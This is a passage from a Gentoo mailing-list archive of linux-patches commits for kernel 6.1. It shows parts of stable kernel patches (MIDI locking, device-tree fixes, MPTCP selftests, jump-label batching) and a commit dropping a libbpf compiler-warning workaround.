+@@ -300,12 +302,15 @@ static void line6_data_received(struct urb *urb)
+ 			dev_dbg(line6->ifcdev, "%d %d buffer overflow - message skipped\n",
+ 				done, urb->actual_length);
+ 		}
++		spin_unlock_irqrestore(&line6->line6midi->lock, flags);
+ 
+ 		for (;;) {
++			spin_lock_irqsave(&line6->line6midi->lock, flags);
+ 			done =
+ 				line6_midibuf_read(mb, line6->buffer_message,
+ 						   LINE6_MIDI_MESSAGE_MAXLEN,
+ 						   LINE6_MIDIBUF_READ_RX);
++			spin_unlock_irqrestore(&line6->line6midi->lock, flags);
+ 
+ 			if (done <= 0)
+ 				break;
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 5d72dc8441cbb..af1b8cf5a9883 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -2594,6 +2594,10 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 	}
+ },
+ 
++/* Stanton ScratchAmp */
++{ USB_DEVICE(0x103d, 0x0100) },
++{ USB_DEVICE(0x103d, 0x0101) },
++
+ /* Novation EMS devices */
+ {
+ 	USB_DEVICE_VENDOR_SPEC(0x1235, 0x0001),
+diff --git a/tools/arch/arm64/include/asm/cputype.h b/tools/arch/arm64/include/asm/cputype.h
+index abc418650fec0..63e90432f8c9f 100644
+--- a/tools/arch/arm64/include/asm/cputype.h
++++ b/tools/arch/arm64/include/asm/cputype.h
+@@ -83,6 +83,9 @@
+ #define ARM_CPU_PART_CORTEX_X2		0xD48
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+ #define ARM_CPU_PART_CORTEX_A78C	0xD4B
++#define ARM_CPU_PART_NEOVERSE_V2	0xD4F
++#define ARM_CPU_PART_CORTEX_X4		0xD82
++#define ARM_CPU_PART_NEOVERSE_V3	0xD84
+ 
+ #define APM_CPU_PART_POTENZA		0x000
+ 
+@@ -145,6 +148,9 @@
+ #define MIDR_CORTEX_X2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X2)
+ #define MIDR_NEOVERSE_N2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_N2)
+ #define MIDR_CORTEX_A78C	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A78C)
++#define MIDR_NEOVERSE_V2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V2)
++#define MIDR_CORTEX_X4 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X4)
++#define MIDR_NEOVERSE_V3 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V3)
+ #define MIDR_THUNDERX	MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX)
+ #define MIDR_THUNDERX_81XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_81XX)
+ #define MIDR_THUNDERX_83XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_83XX)
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index 21817eb510396..7e0b846e17eef 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -1707,10 +1707,6 @@ static int load_with_options(int argc, char **argv, bool first_prog_only)
+ 	}
+ 
+ 	if (pinmaps) {
+-		err = create_and_mount_bpffs_dir(pinmaps);
+-		if (err)
+-			goto err_unpin;
+-
+ 		err = bpf_object__pin_maps(obj, pinmaps);
+ 		if (err) {
+ 			p_err("failed to pin all maps");
+diff --git a/tools/testing/selftests/bpf/prog_tests/send_signal.c b/tools/testing/selftests/bpf/prog_tests/send_signal.c
+index d63a20fbed339..210b806351bcf 100644
+--- a/tools/testing/selftests/bpf/prog_tests/send_signal.c
++++ b/tools/testing/selftests/bpf/prog_tests/send_signal.c
+@@ -152,7 +152,8 @@ static void test_send_signal_tracepoint(bool signal_thread)
+ static void test_send_signal_perf(bool signal_thread)
+ {
+ 	struct perf_event_attr attr = {
+-		.sample_period = 1,
++		.freq = 1,
++		.sample_freq = 1000,
+ 		.type = PERF_TYPE_SOFTWARE,
+ 		.config = PERF_COUNT_SW_CPU_CLOCK,
+ 	};
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 51f68bb6bdb8a..a283107646540 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -1800,6 +1800,8 @@ chk_prio_nr()
+ {
+ 	local mp_prio_nr_tx=$1
+ 	local mp_prio_nr_rx=$2
++	local mpj_syn=$3
++	local mpj_syn_ack=$4
+ 	local count
+ 	local dump_stats
+ 
+@@ -1827,6 +1829,30 @@ chk_prio_nr()
+ 		echo "[ ok ]"
+ 	fi
+ 
++	printf "%-${nr_blank}s %s" " " "bkp syn"
++	count=$(get_counter ${ns1} "MPTcpExtMPJoinSynBackupRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$mpj_syn" ]; then
++		echo "[fail] got $count JOIN[s] syn with Backup expected $mpj_syn"
++		fail_test
++		dump_stats=1
++	else
++		echo -n "[ ok ]"
++	fi
++
++	echo -n " - synack   "
++	count=$(get_counter ${ns2} "MPTcpExtMPJoinSynAckBackupRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$mpj_syn_ack" ]; then
++		echo "[fail] got $count JOIN[s] synack with Backup expected $mpj_syn_ack"
++		fail_test
++		dump_stats=1
++	else
++		echo "[ ok ]"
++	fi
++
+ 	[ "${dump_stats}" = 1 ] && dump_stats
+ }
+ 
+@@ -2633,11 +2659,23 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup
+ 		chk_join_nr 1 1 1
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 1 0
+ 	fi
+ 
+ 	# single address, backup
+ 	if reset "single address, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 1
++		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal,backup
++		pm_nl_set_limits $ns2 1 1
++		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup
++		chk_join_nr 1 1 1
++		chk_add_nr 1 1
++		chk_prio_nr 1 0 0 1
++	fi
++
++	# single address, switch to backup
++	if reset "single address, switch to backup" &&
+ 	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+@@ -2645,19 +2683,19 @@ backup_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+-		chk_prio_nr 1 1
++		chk_prio_nr 1 1 0 0
+ 	fi
+ 
+ 	# single address with port, backup
+ 	if reset "single address with port, backup" &&
+ 	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+-		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal port 10100
++		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal,backup port 10100
+ 		pm_nl_set_limits $ns2 1 1
+-		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
++		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+-		chk_prio_nr 1 1
++		chk_prio_nr 1 0 0 1
+ 	fi
+ 
+ 	if reset "mpc backup" &&
+@@ -2665,16 +2703,25 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 0 0 0
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 0 0
+ 	fi
+ 
+ 	if reset "mpc backup both sides" &&
+ 	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+-		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow,backup
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 1 2
++		pm_nl_add_endpoint $ns1 10.0.1.1 flags signal,backup
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
++
++		# 10.0.2.2 (non-backup) -> 10.0.1.1 (backup)
++		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow
++		# 10.0.1.2 (backup) -> 10.0.2.1 (non-backup)
++		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
++		ip -net "$ns2" route add 10.0.2.1 via 10.0.1.1 dev ns2eth1 # force this path
++
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+-		chk_join_nr 0 0 0
+-		chk_prio_nr 1 1
++		chk_join_nr 2 2 2
++		chk_prio_nr 1 1 1 1
+ 	fi
+ 
+ 	if reset "mpc switch to backup" &&
+@@ -2682,7 +2729,7 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 0 0
+ 	fi
+ 
+ 	if reset "mpc switch to backup both sides" &&
+@@ -2691,7 +2738,7 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+-		chk_prio_nr 1 1
++		chk_prio_nr 1 1 0 0
+ 	fi
+ }
+ 
+@@ -3022,7 +3069,7 @@ fullmesh_tests()
+ 		pm_nl_set_limits $ns2 4 4
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 1 slow backup,fullmesh
+ 		chk_join_nr 2 2 2
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 1 0
+ 		chk_rm_nr 0 1
+ 	fi
+ 
+@@ -3034,7 +3081,7 @@ fullmesh_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow,backup,fullmesh
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup,nofullmesh
+ 		chk_join_nr 2 2 2
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 1 0
+ 		chk_rm_nr 0 1
+ 	fi
+ }
+@@ -3140,7 +3187,7 @@ userspace_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 1 1 0
+-		chk_prio_nr 0 0
++		chk_prio_nr 0 0 0 0
+ 	fi
+ 
+ 	# userspace pm type prevents rm_addr
+diff --git a/tools/testing/selftests/rcutorture/bin/torture.sh b/tools/testing/selftests/rcutorture/bin/torture.sh
+index d477618e7261d..483f22f5abd7c 100755
+--- a/tools/testing/selftests/rcutorture/bin/torture.sh
++++ b/tools/testing/selftests/rcutorture/bin/torture.sh
+@@ -405,16 +405,16 @@ fi
+ 
+ if test "$do_clocksourcewd" = "yes"
+ then
+-	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000"
++	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 tsc=watchdog"
+ 	torture_set "clocksourcewd-1" tools/testing/selftests/rcutorture/bin/kvm.sh --allcpus --duration 45s --configs TREE03 --kconfig "CONFIG_TEST_CLOCKSOURCE_WATCHDOG=y" --trust-make
+ 
+-	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 clocksource.max_cswd_read_retries=1"
++	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 tsc=watchdog"
+ 	torture_set "clocksourcewd-2" tools/testing/selftests/rcutorture/bin/kvm.sh --allcpus --duration 45s --configs TREE03 --kconfig "CONFIG_TEST_CLOCKSOURCE_WATCHDOG=y" --trust-make
+ 
+ 	# In case our work is already done...
+ 	if test "$do_rcutorture" != "yes"
+ 	then
+-		torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000"
++		torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 tsc=watchdog"
+ 		torture_set "clocksourcewd-3" tools/testing/selftests/rcutorture/bin/kvm.sh --allcpus --duration 45s --configs TREE03 --trust-make
+ 	fi
+ fi


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-11 13:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-11 13:32 UTC (permalink / raw
  To: gentoo-commits

commit:     2c7a18d50c40d0cea893591cf6cad68893a1de20
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Aug 11 13:31:29 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Aug 11 13:31:29 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2c7a18d5

Drop libbfp patch. Not relevant for 6.1

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...workaround-Wmaybe-uninitialized-false-pos.patch | 67 ----------------------
 2 files changed, 71 deletions(-)

diff --git a/0000_README b/0000_README
index 86ad8e24..e41d3db8 100644
--- a/0000_README
+++ b/0000_README
@@ -499,10 +499,6 @@ Patch:  2960_jump-label-fix.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
 Desc:   jump_label: Fix a regression
 
-Patch:  2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
-From:   https://lore.kernel.org/bpf/3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org/
-Desc:   libbpf: workaround -Wmaybe-uninitialized false positive
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch b/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
deleted file mode 100644
index 86de18d7..00000000
--- a/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From git@z Thu Jan  1 00:00:00 1970
-Subject: [PATCH] libbpf: workaround -Wmaybe-uninitialized false positive
-From: Sam James <sam@gentoo.org>
-Date: Fri, 09 Aug 2024 16:24:04 +0100
-Message-Id: <3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org>
-MIME-Version: 1.0
-Content-Type: text/plain; charset="utf-8"
-Content-Transfer-Encoding: 8bit
-
-In `elf_close`, we get this with GCC 15 -O3 (at least):
-```
-In function ‘elf_close’,
-    inlined from ‘elf_close’ at elf.c:53:6,
-    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
-elf.c:57:9: warning: ‘elf_fd.elf’ may be used uninitialized [-Wmaybe-uninitialized]
-   57 |         elf_end(elf_fd->elf);
-      |         ^~~~~~~~~~~~~~~~~~~~
-elf.c: In function ‘elf_find_func_offset_from_file’:
-elf.c:377:23: note: ‘elf_fd.elf’ was declared here
-  377 |         struct elf_fd elf_fd;
-      |                       ^~~~~~
-In function ‘elf_close’,
-    inlined from ‘elf_close’ at elf.c:53:6,
-    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
-elf.c:58:9: warning: ‘elf_fd.fd’ may be used uninitialized [-Wmaybe-uninitialized]
-   58 |         close(elf_fd->fd);
-      |         ^~~~~~~~~~~~~~~~~
-elf.c: In function ‘elf_find_func_offset_from_file’:
-elf.c:377:23: note: ‘elf_fd.fd’ was declared here
-  377 |         struct elf_fd elf_fd;
-      |                       ^~~~~~
-```
-
-In reality, our use is fine, it's just that GCC doesn't model errno
-here (see linked GCC bug). Suppress -Wmaybe-uninitialized accordingly.
-
-Link: https://gcc.gnu.org/PR114952
-Signed-off-by: Sam James <sam@gentoo.org>
----
- tools/lib/bpf/elf.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/tools/lib/bpf/elf.c b/tools/lib/bpf/elf.c
-index c92e02394159e..ee226bb8e1af0 100644
---- a/tools/lib/bpf/elf.c
-+++ b/tools/lib/bpf/elf.c
-@@ -369,6 +369,9 @@ long elf_find_func_offset(Elf *elf, const char *binary_path, const char *name)
- 	return ret;
- }
- 
-+#pragma GCC diagnostic push
-+/* https://gcc.gnu.org/PR114952 */
-+#pragma GCC diagnostic ignored "-Wmaybe-uninitialized"
- /* Find offset of function name in ELF object specified by path. "name" matches
-  * symbol name or name@@LIB for library functions.
-  */
-@@ -384,6 +387,7 @@ long elf_find_func_offset_from_file(const char *binary_path, const char *name)
- 	elf_close(&elf_fd);
- 	return ret;
- }
-+#pragma GCC diagnostic pop
- 
- struct symbol {
- 	const char *name;
--- 
-2.45.2
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-11 13:29 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-11 13:29 UTC (permalink / raw
  To: gentoo-commits

commit:     dca16a6cea3a2943eafe6ce25311f7b5c0a84d9c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Aug 11 13:29:06 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Aug 11 13:29:06 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=dca16a6c

Linux patch 6.1.104

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1103_linux-6.1.104.patch | 3025 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3029 insertions(+)

diff --git a/0000_README b/0000_README
index 97b15896..86ad8e24 100644
--- a/0000_README
+++ b/0000_README
@@ -455,6 +455,10 @@ Patch:  1102_linux-6.1.103.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.103
 
+Patch:  1103_linux-6.1.104.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.104
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1103_linux-6.1.104.patch b/1103_linux-6.1.104.patch
new file mode 100644
index 00000000..3de54dbb
--- /dev/null
+++ b/1103_linux-6.1.104.patch
@@ -0,0 +1,3025 @@
+diff --git a/Makefile b/Makefile
+index 97149e46565ae..0dd963d6d8d26 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 103
++SUBLEVEL = 104
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 3d8e5ba51ce0d..2f53c099634b5 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -593,6 +593,7 @@ dwc_0: usb@8a00000 {
+ 				interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&qusb_phy_0>, <&usb0_ssphy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
++				snps,parkmode-disable-ss-quirk;
+ 				snps,is-utmi-l1-suspend;
+ 				snps,hird-threshold = /bits/ 8 <0x0>;
+ 				snps,dis_u2_susphy_quirk;
+@@ -635,6 +636,7 @@ dwc_1: usb@8c00000 {
+ 				interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&qusb_phy_1>, <&usb1_ssphy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
++				snps,parkmode-disable-ss-quirk;
+ 				snps,is-utmi-l1-suspend;
+ 				snps,hird-threshold = /bits/ 8 <0x0>;
+ 				snps,dis_u2_susphy_quirk;
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index 3d4941dc31d74..4de9ff045ff52 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -2029,7 +2029,8 @@ usb3_dwc3: usb@a800000 {
+ 				interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>;
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
+-				phys = <&qusb2phy>, <&usb1_ssphy>;
++				snps,parkmode-disable-ss-quirk;
++				phys = <&qusb2phy>, <&usb3phy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+ 				snps,has-lpm-erratum;
+ 				snps,hird-threshold = /bits/ 8 <0x10>;
+@@ -2038,33 +2039,26 @@ usb3_dwc3: usb@a800000 {
+ 
+ 		usb3phy: phy@c010000 {
+ 			compatible = "qcom,msm8998-qmp-usb3-phy";
+-			reg = <0x0c010000 0x18c>;
+-			status = "disabled";
+-			#address-cells = <1>;
+-			#size-cells = <1>;
+-			ranges;
++			reg = <0x0c010000 0x1000>;
+ 
+ 			clocks = <&gcc GCC_USB3_PHY_AUX_CLK>,
++				 <&gcc GCC_USB3_CLKREF_CLK>,
+ 				 <&gcc GCC_USB_PHY_CFG_AHB2PHY_CLK>,
+-				 <&gcc GCC_USB3_CLKREF_CLK>;
+-			clock-names = "aux", "cfg_ahb", "ref";
++				 <&gcc GCC_USB3_PHY_PIPE_CLK>;
++			clock-names = "aux",
++				      "ref",
++				      "cfg_ahb",
++				      "pipe";
++			clock-output-names = "usb3_phy_pipe_clk_src";
++			#clock-cells = <0>;
++			#phy-cells = <0>;
+ 
+ 			resets = <&gcc GCC_USB3_PHY_BCR>,
+ 				 <&gcc GCC_USB3PHY_PHY_BCR>;
+-			reset-names = "phy", "common";
++			reset-names = "phy",
++				      "phy_phy";
+ 
+-			usb1_ssphy: phy@c010200 {
+-				reg = <0xc010200 0x128>,
+-				      <0xc010400 0x200>,
+-				      <0xc010c00 0x20c>,
+-				      <0xc010600 0x128>,
+-				      <0xc010800 0x200>;
+-				#phy-cells = <0>;
+-				#clock-cells = <0>;
+-				clocks = <&gcc GCC_USB3_PHY_PIPE_CLK>;
+-				clock-names = "pipe0";
+-				clock-output-names = "usb3_phy_pipe_clk_src";
+-			};
++			status = "disabled";
+ 		};
+ 
+ 		qusb2phy: phy@c012000 {
+diff --git a/arch/arm64/include/asm/jump_label.h b/arch/arm64/include/asm/jump_label.h
+index b5bd3c38a01b2..e714d7770999e 100644
+--- a/arch/arm64/include/asm/jump_label.h
++++ b/arch/arm64/include/asm/jump_label.h
+@@ -13,6 +13,7 @@
+ #include <linux/types.h>
+ #include <asm/insn.h>
+ 
++#define HAVE_JUMP_LABEL_BATCH
+ #define JUMP_LABEL_NOP_SIZE		AARCH64_INSN_SIZE
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key,
+diff --git a/arch/arm64/kernel/jump_label.c b/arch/arm64/kernel/jump_label.c
+index faf88ec9c48e8..f63ea915d6ad2 100644
+--- a/arch/arm64/kernel/jump_label.c
++++ b/arch/arm64/kernel/jump_label.c
+@@ -7,11 +7,12 @@
+  */
+ #include <linux/kernel.h>
+ #include <linux/jump_label.h>
++#include <linux/smp.h>
+ #include <asm/insn.h>
+ #include <asm/patching.h>
+ 
+-void arch_jump_label_transform(struct jump_entry *entry,
+-			       enum jump_label_type type)
++bool arch_jump_label_transform_queue(struct jump_entry *entry,
++				     enum jump_label_type type)
+ {
+ 	void *addr = (void *)jump_entry_code(entry);
+ 	u32 insn;
+@@ -25,4 +26,10 @@ void arch_jump_label_transform(struct jump_entry *entry,
+ 	}
+ 
+ 	aarch64_insn_patch_text_nosync(addr, insn);
++	return true;
++}
++
++void arch_jump_label_transform_apply(void)
++{
++	kick_all_cpus_sync();
+ }
+diff --git a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+index 9089d1e4f3fee..cc7747c5f21f3 100644
+--- a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
++++ b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+@@ -96,12 +96,19 @@ liointc1: interrupt-controller@1fe11440 {
+ 						<0x00000000>; /* int3 */
+ 		};
+ 
++		rtc0: rtc@1fe07800 {
++			compatible = "loongson,ls2k1000-rtc";
++			reg = <0 0x1fe07800 0 0x78>;
++			interrupt-parent = <&liointc1>;
++			interrupts = <8 IRQ_TYPE_LEVEL_HIGH>;
++		};
++
+ 		uart0: serial@1fe00000 {
+ 			compatible = "ns16550a";
+ 			reg = <0 0x1fe00000 0 0x8>;
+ 			clock-frequency = <125000000>;
+ 			interrupt-parent = <&liointc0>;
+-			interrupts = <0 IRQ_TYPE_LEVEL_LOW>;
++			interrupts = <0 IRQ_TYPE_LEVEL_HIGH>;
+ 			no-loopback-test;
+ 		};
+ 
+@@ -110,7 +117,6 @@ pci@1a000000 {
+ 			device_type = "pci";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			#interrupt-cells = <2>;
+ 
+ 			reg = <0 0x1a000000 0 0x02000000>,
+ 				<0xfe 0x00000000 0 0x20000000>;
+@@ -125,8 +131,8 @@ gmac@3,0 {
+ 						   "pciclass0c03";
+ 
+ 				reg = <0x1800 0x0 0x0 0x0 0x0>;
+-				interrupts = <12 IRQ_TYPE_LEVEL_LOW>,
+-					     <13 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <12 IRQ_TYPE_LEVEL_HIGH>,
++					     <13 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+ 				phy-mode = "rgmii-id";
+@@ -149,8 +155,8 @@ gmac@3,1 {
+ 						   "loongson, pci-gmac";
+ 
+ 				reg = <0x1900 0x0 0x0 0x0 0x0>;
+-				interrupts = <14 IRQ_TYPE_LEVEL_LOW>,
+-					     <15 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <14 IRQ_TYPE_LEVEL_HIGH>,
++					     <15 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+ 				phy-mode = "rgmii-id";
+@@ -172,7 +178,7 @@ ehci@4,1 {
+ 						   "pciclass0c03";
+ 
+ 				reg = <0x2100 0x0 0x0 0x0 0x0>;
+-				interrupts = <18 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <18 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 			};
+ 
+@@ -183,7 +189,7 @@ ohci@4,2 {
+ 						   "pciclass0c03";
+ 
+ 				reg = <0x2200 0x0 0x0 0x0 0x0>;
+-				interrupts = <19 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <19 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 			};
+ 
+@@ -194,97 +200,121 @@ sata@8,0 {
+ 						   "pciclass0106";
+ 
+ 				reg = <0x4000 0x0 0x0 0x0 0x0>;
+-				interrupts = <19 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <19 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc0>;
+ 			};
+ 
+-			pci_bridge@9,0 {
++			pcie@9,0 {
+ 				compatible = "pci0014,7a19.0",
+ 						   "pci0014,7a19",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x4800 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <0 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <0 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 0 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 0 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@a,0 {
++			pcie@a,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x5000 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
